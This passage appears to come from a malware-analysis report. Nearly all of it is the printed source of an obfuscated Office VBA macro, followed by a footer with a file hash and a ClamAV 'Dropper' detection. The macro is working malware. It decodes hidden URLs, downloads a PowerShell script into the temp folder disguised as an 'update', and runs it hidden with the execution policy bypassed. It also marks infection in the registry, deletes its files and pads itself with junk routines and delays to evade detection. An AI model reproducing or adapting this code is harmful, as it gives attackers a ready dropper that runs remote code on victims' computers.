Chr(76) & Chr(106) & Chr(65) & Chr(117) & Chr(77) & Chr(84) & Chr(111) & Chr(49) & _
Chr(77) & Chr(68) & Chr(85) & Chr(119) & Chr(76) & Chr(122) & Chr(77) & Chr(117) & _
Chr(99) & Chr(72) & Chr(77) & Chr(120)
Dim FZkaVxSdGxIsxh As String
Randomize
Dim qlsOVrkmjcd As String
qlsOVrkmjcd = CStr(Int((99999 - 10000 + 1) * Rnd + 10000))
FZkaVxSdGxIsxh = Environ(Chr(84) & Chr(69) & Chr(77) & Chr(80)) & Chr(92) & qlsOVrkmjcd & Chr(95) & Chr(117) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(101) & Chr(46) & _
Chr(112) & Chr(115) & Chr(49)
rRm1COOGYqy
Dim kWvnvCkvnl As Boolean
Dim uSjLOll1UOVe As Integer, ItIRxRq As Integer
kWvnvCkvnl = False
For uSjLOll1UOVe = 0 To 2
Dim ZlMLOONE As String
ZlMLOONE = ACkOxh(urls(uSjLOll1UOVe))
For ItIRxRq = 1 To 3
If OXVKlNf(ZlMLOONE, FZkaVxSdGxIsxh) Then
If WPBjow11iG(FZkaVxSdGxIsxh) Then
kWvnvCkvnl = True
Exit For
Else
zOClteVOSbdXCL FZkaVxSdGxIsxh
End If
End If
If ItIRxRq < 3 Then ZFvcwHlhFQB 5000
Next ItIRxRq
If kWvnvCkvnl Then Exit For
ZFvcwHlhFQB 8000
Next uSjLOll1UOVe
If Not kWvnvCkvnl Then Exit Sub
wdaPALqhkI
OQgGIlnvc FZkaVxSdGxIsxh
ZFvcwHlhFQB 8000
zOClteVOSbdXCL FZkaVxSdGxIsxh
End Sub
Private Sub SN1tXI()
Dim oosbOsaOSa As Long, MeR1l1OM As String, EellUI As Double
oosbOsaOSa = ((98 + 792) + (42 + 333))
MeR1l1OM = Chr(74) & Chr(77)
EellUI = oosbOsaOSa * 6.7815
If (Len("WHlNeVcp") > 0) Then
MeR1l1OM = Left(MeR1l1OM, 1)
End If
End Sub
Private Function DOSffBszpomu() As Boolean
On Error Resume Next
Dim yFRIxCt As Object
Set yFRIxCt = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & _
Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
Dim hMipIPy1Zriol As String
hMipIPy1Zriol = Chr(72) & Chr(75) & Chr(67) & Chr(85) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & _
Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & _
Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & _
Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(85) & _
Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(101) & Chr(83) & Chr(118) & Chr(99) & _
Chr(92) & Chr(114) & Chr(97) & Chr(110)
Dim ZkutoHhDBwIrr As String
ZkutoHhDBwIrr = yFRIxCt.RegRead(hMipIPy1Zriol)
If Err.Number = 0 And ZkutoHhDBwIrr = Chr(49) Then
DOSffBszpomu = True
Else
DOSffBszpomu = False
End If
On Error GoTo 0
End Function
Private Sub wdaPALqhkI()
On Error Resume Next
Dim yFRIxCt As Object
Set yFRIxCt = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & _
Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
yFRIxCt.RegWrite Chr(72) & Chr(75) & Chr(67) & Chr(85) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & _
Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & _
Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & _
Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(85) & _
Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(101) & Chr(83) & Chr(118) & Chr(99) & _
Chr(92) & Chr(114) & Chr(97) & Chr(110), Chr(49), Chr(82) & Chr(69) & Chr(71) & Chr(95) & Chr(83) & Chr(90)
On Error GoTo 0
End Sub
Private Sub yXOYwOOYISvuYR()
Dim YaonfImfdKlo As Long, DcllveqDwULJbl As String, agH1aIIG As Double
YaonfImfdKlo = ((15 + 357) + (90 + 23))
DcllveqDwULJbl = Chr(75) & Chr(85)
agH1aIIG = YaonfImfdKlo * 5.3952
If ((6 * 3) > 0) Then
DcllveqDwULJbl = Left(DcllveqDwULJbl, 1)
End If
End Sub
Private Sub tIclLTshImO1B()
Dim ejrLgrvXNI1p As Long, qu1S1g As String, nrBewJMwBxdxvd As Double
ejrLgrvXNI1p = ((64 + 428) + (57 + 252))
qu1S1g = Chr(67) & Chr(75)
nrBewJMwBxdxvd = ejrLgrvXNI1p * 1.0922
If ((984 Mod 2) = 757 Mod 2) Then
qu1S1g = Left(qu1S1g, 1)
End If
End Sub
Private Function OXVKlNf(ByVal url As String, ByVal destPath As String) As Boolean
On Error GoTo Fail
Dim isqOWXu As Object
Set isqOWXu = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(88) & _
Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) & Chr(46) & Chr(54) & _
Chr(46) & Chr(48))
isqOWXu.Open Chr(71) & Chr(69) & Chr(84), url, False
isqOWXu.setRequestHeader Chr(85) & Chr(115) & Chr(101) & Chr(114) & Chr(45) & Chr(65) & Chr(103) & Chr(101) & _
Chr(110) & Chr(116), Chr(77) & Chr(111) & Chr(122) & Chr(105) & Chr(108) & Chr(108) & Chr(97) & Chr(47) & _
Chr(53) & Chr(46) & Chr(48) & Chr(32) & Chr(40) & Chr(87) & Chr(105) & Chr(110) & _
Chr(100) & Chr(111) & Chr(119) & Chr(115) & Chr(32) & Chr(78) & Chr(84) & Chr(32) & _
Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(59) & Chr(32) & Chr(87) & Chr(105) & _
Chr(110) & Chr(54) & Chr(52) & Chr(59) & Chr(32) & Chr(120) & Chr(54) & Chr(52) & _
Chr(41)
isqOWXu.setRequestHeader Chr(67) & Chr(97) & Chr(99) & Chr(104) & Chr(101) & Chr(45) & Chr(67) & Chr(111) & _
Chr(110) & Chr(116) & Chr(114) & Chr(111) & Chr(108), Chr(110) & Chr(111) & Chr(45) & Chr(99) & Chr(97) & Chr(99) & Chr(104) & Chr(101)
isqOWXu.Send
If isqOWXu.Status = 200 Then
Dim rmYjpthoHF As Object
Set rmYjpthoHF = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & _
Chr(114) & Chr(101) & Chr(97) & Chr(109))
rmYjpthoHF.Open
rmYjpthoHF.Type = 1
rmYjpthoHF.Write isqOWXu.responseBody
rmYjpthoHF.SaveToFile destPath, 2
rmYjpthoHF.Close
OXVKlNf = True
End If
Exit Function
Fail:
OXVKlNf = False
End Function
Private Function WPBjow11iG(ByVal filePath As String) As Boolean
On Error GoTo Fail
If Dir(filePath) = "" Then
WPBjow11iG = False
Exit Function
End If
Dim eISlKcFZIItlY As Integer
eISlKcFZIItlY = FreeFile
Open filePath For Input As #eISlKcFZIItlY
Dim YtyTlE1 As String
YtyTlE1 = ""
If Not EOF(eISlKcFZIItlY) Then
Dim qTwyat As String * 1
Get #eISlKcFZIItlY, , qTwyat
YtyTlE1 = qTwyat
End If
Close #eISlKcFZIItlY
WPBjow11iG = (Len(Dir(filePath)) > 0 And YtyTlE1 <> "")
Exit Function
Fail:
WPBjow11iG = False
End Function
Private Sub OQgGIlnvc(ByVal filePath As String)
Dim L1F1ACQGI As String
Dim EJU1lR11z1pmWv As LongPtr
L1F1ACQGI = "-NonInteractive -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File """ & filePath & """"
EJU1lR11z1pmWv = tNn1lsUnS(0, Chr(111) & Chr(112) & Chr(101) & Chr(110), Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & _
Chr(108) & Chr(108) & Chr(46) & Chr(101) & Chr(120) & Chr(101), L1F1ACQGI, Chr(67) & Chr(58) & Chr(92), 0)
End Sub
Private Sub mTkVLw()
Dim rDzWIYN As Long, TNOqqVH1olgl As String, KPHpuURwxop1 As Double
rDzWIYN = ((13 + 308) + (79 + 704))
TNOqqVH1olgl = Chr(84) & Chr(84)
KPHpuURwxop1 = rDzWIYN * 7.5316
If ((8 * 2) > 0) Then
TNOqqVH1olgl = Left(TNOqqVH1olgl, 1)
End If
End Sub
Private Sub BVlfDUnlmlgIE()
Dim OXzbalEHxllOJ As Long, QVteDUI As String, HOwgmA1n As Double
OXzbalEHxllOJ = ((22 + 348) + (100 + 736))
QVteDUI = Chr(75) & Chr(90)
HOwgmA1n = OXzbalEHxllOJ * 7.0935
If ((7 * 4) > 0) Then
QVteDUI = Left(QVteDUI, 1)
End If
End Sub
Private Sub zOClteVOSbdXCL(ByVal filePath As String)
On Error Resume Next
Kill filePath
On Error GoTo 0
End Sub
Private Sub FClWjhOqIlD()
Dim CNSjQGtBPiwH As Long, hoATHQMMllHLOl As String, UckTOAEOlD As Double
CNSjQGtBPiwH = ((21 + 287) + (97 + 23))
hoATHQMMllHLOl = Chr(67) & Chr(78)
UckTOAEOlD = CNSjQGtBPiwH * 9.2909
If (Len("QglHUcu") > 0) Then
hoATHQMMllHLOl = Left(hoATHQMMllHLOl, 1)
End If
End Sub
Private Sub mJlliFlDhNh()
Dim PXyHBdIuW As Long, RXK1qyBH1RgI As String, F1RMxDGTHG As Double
PXyHBdIuW = ((77 + 884) + (17 + 44))
RXK1qyBH1RgI = Chr(71) & Chr(74)
F1RMxDGTHG = PXyHBdIuW * 7.32
If ((7 * 3) > 0) Then
RXK1qyBH1RgI = Left(RXK1qyBH1RgI, 1)
End If
End Sub
Private Sub rRm1COOGYqy()
On Error Resume Next
Dim XOLOXY As String
XOLOXY = Environ(Chr(84) & Chr(69) & Chr(77) & Chr(80))
Dim crielW1POto As String
crielW1POto = Dir(XOLOXY & Chr(92) & Chr(42) & Chr(95) & Chr(117) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & _
Chr(101) & Chr(46) & Chr(112) & Chr(115) & Chr(49))
Do While crielW1POto <> ""
Kill XOLOXY & Chr(92) & crielW1POto
crielW1POto = Dir()
Loop
On Error GoTo 0
End Sub
Private Sub oIl1IICt()
Dim eA1ZjzIQFll As Long, TaDUsdW As String, SUlUuU As Double
eA1ZjzIQFll = ((30 + 925) + (67 + 390))
TaDUsdW = Chr(71) & Chr(82)
SUlUuU = eA1ZjzIQFll * 9.8093
If ((5 * 3) > 0) Then
TaDUsdW = Left(TaDUsdW, 1)
End If
End Sub
Private Sub EOYIlgPeDUFx()
Dim QYQIvnlWnO As Long, OPjoiIvs As String, IY1qdN1ylHCIQ As Double
QYQIvnlWnO = ((39 + 215) + (65 + 384))
OPjoiIvs = Chr(77) & Chr(76)
IY1qdN1ylHCIQ = QYQIvnlWnO * 9.1903
If ((355 Mod 2) = 773 Mod 2) Then
OPjoiIvs = Left(OPjoiIvs, 1)
End If
End Sub
Private Function PbsBADOsJbNP() As Boolean
On Error GoTo Fail
Dim isqOWXu As Object
Set isqOWXu = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(88) & _
Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) & Chr(46) & Chr(54) & _
Chr(46) & Chr(48))
isqOWXu.Open Chr(72) & Chr(69) & Chr(65) & Chr(68), Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & _
Chr(119) & Chr(119) & Chr(119) & Chr(46) & Chr(103) & Chr(111) & Chr(111) & Chr(103) & _
Chr(108) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109), False
isqOWXu.Send
PbsBADOsJbNP = (isqOWXu.Status = 200)
Exit Function
Fail:
PbsBADOsJbNP = False
End Function
Private Function ACkOxh(ByVal b64 As String) As String
Dim GzFBBHznqOy As Object, bf1ffO As Object
Set GzFBBHznqOy = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(68) & _
Chr(79) & Chr(77) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & _
Chr(110) & Chr(116) & Chr(46) & Chr(54) & Chr(46) & Chr(48))
Set bf1ffO = GzFBBHznqOy.createElement(Chr(98) & Chr(54) & Chr(52))
bf1ffO.DataType = Chr(98) & Chr(105) & Chr(110) & Chr(46) & Chr(98) & Chr(97) & Chr(115) & Chr(101) & _
Chr(54) & Chr(52)
bf1ffO.Text = b64
ACkOxh = StrConv(bf1ffO.nodeTypedValue, vbUnicode)
End Function
Private Sub zD1wIIeaOBdIO()
Dim fSVFlecvx1 As Long, CXOJIV11OREUWP As Long, at1kWxHgGUvxdl As Long
fSVFlecvx1 = 20000
CXOJIV11OREUWP = 45000
Randomize Timer
at1kWxHgGUvxdl = fSVFlecvx1 + Int(Rnd() * (CXOJIV11OREUWP - fSVFlecvx1))
ZFvcwHlhFQB at1kWxHgGUvxdl
End Sub
Private Sub FOOwpkIqgbxC()
Dim sVCoxnMim As Long, RYIOhO As String, WyGxHyINb As Double
sVCoxnMim = ((3 + 244) + (66 + -1))
RYIOhO = Chr(67) & Chr(71)
WyGxHyINb = sVCoxnMim * 6.7484
If ((132 Mod 2) = 818 Mod 2) Then
RYIOhO = Left(RYIOhO, 1)
End If
End Sub
Private Sub FQGnjwWflxR()
Dim AhPbRxy As Long, ZIsvoRChjTwq As String, ZOv1LkJR As Double
AhPbRxy = ((95 + 841) + (70 + 276))
ZIsvoRChjTwq = Chr(68) & Chr(84)
ZOv1LkJR = AhPbRxy * 2.5934
If (Len("swwc") > 0) Then
ZIsvoRChjTwq = Left(ZIsvoRChjTwq, 1)
End If
End Sub
Private Sub rKKpIGsqHY()
Dim uKlVGX As Long, eYbvElZgIBfJZ As Long, gV1YseonlJ As Long
Dim V1INTU As Double
V1INTU = Timer
For uKlVGX = 1 To 1000000
For eYbvElZgIBfJZ = 1 To 100
gV1YseonlJ = uKlVGX * eYbvElZgIBfJZ
Next eYbvElZgIBfJZ
If Timer - V1INTU > 10 Then Exit For
Next uKlVGX
End Sub
Private Sub GwJ1wT()
Dim hBtOOub As Long, YeqGrJHtlUjypx As String, wRUyIg As Double
hBtOOub = ((56 + 911) + (59 + 701))
YeqGrJHtlUjypx = Chr(69) & Chr(85)
wRUyIg = hBtOOub * 5.8934
If ((624 Mod 2) = 171 Mod 2) Then
YeqGrJHtlUjypx = Left(YeqGrJHtlUjypx, 1)
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 69120 bytes |
SHA-256: 506c884bd0d8af41f3fd92b8a4b8478ef5eeddd1577a1dc577b7c04bd070ba0e |
|||
|
Detection
ClamAV:
Xls.Dropper.Generic-6595971-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.